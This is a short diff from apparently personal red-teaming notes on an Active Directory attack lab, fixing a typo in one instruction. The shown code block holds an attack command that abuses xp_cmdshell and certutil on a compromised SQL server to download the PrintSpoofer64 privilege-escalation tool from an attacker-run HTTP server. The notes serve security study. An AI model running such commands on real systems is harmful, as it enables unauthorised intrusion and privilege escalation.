gabriele-annese/-computer-science-Notes/CyberSecurity/Red teaming/Active Directory/Skill Assestment/AD Enumeration & Attacks - Part II.md

 ```

-now activate the `python3 -m http.server` on the ssh attack machine and download on th `SQL01` machine with the following command
+now activate the `python3 -m http.server` on the ssh attack machine and download on the `SQL01` machine with the following command
 ```bash
 xp_cmdshell certutil -urlcache -split -f "http://172.16.7.240:9000/PrintSpoofer64.exe" c:\windows\temp\PrintSpoofer64.exe
 ```